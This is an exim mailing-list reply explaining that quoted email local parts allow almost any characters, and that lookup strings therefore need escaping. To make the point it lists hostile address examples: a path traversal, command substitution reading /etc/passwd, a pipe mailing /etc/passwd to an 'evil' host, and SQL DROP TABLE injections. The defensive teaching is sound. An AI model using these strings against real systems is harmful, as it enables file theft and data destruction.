Re: [exim] which config file is being read?

Kezdőlap
Üzenet törlése
Válasz az üzenetre
Szerző: Phil Pennock
Dátum:  
Címzett: Andy Smith
CC: exim-users
Tárgy: Re: [exim] which config file is being read?
On 2008-09-28 at 12:29 +0100, Andy Smith wrote:
> thanks, I had checked if " is a valid character for an email address and I
> dont think it is, but your solution is better as u never know who will break
> the rules ;)


It is valid. Left-hand sides can use double-quotes to expand the
available set of characters.

Valid email addresses (syntactically):
fred@???
"fred bloggs"@???
" fred "@???
""@???
a~`*&^%$#!._-={|}'/+?b@???
../etc/passwd@???
`cat%20/etc/passwd`@???
"cat /etc/passwd | Mail -s w00t evil@???

And in homage to http://xkcd.com/327/ I offer:
"phil'); DROP TABLE domains; DROP TABLE passwords; --"@???

So yes, ${quote_<lookup-type>:<string>} is rather important to use.

Regards,
"X'); DROP TABLE domains; DROP TABLE passwords; --"@???
(yes, that address is valid and reaches me, and not via catchall)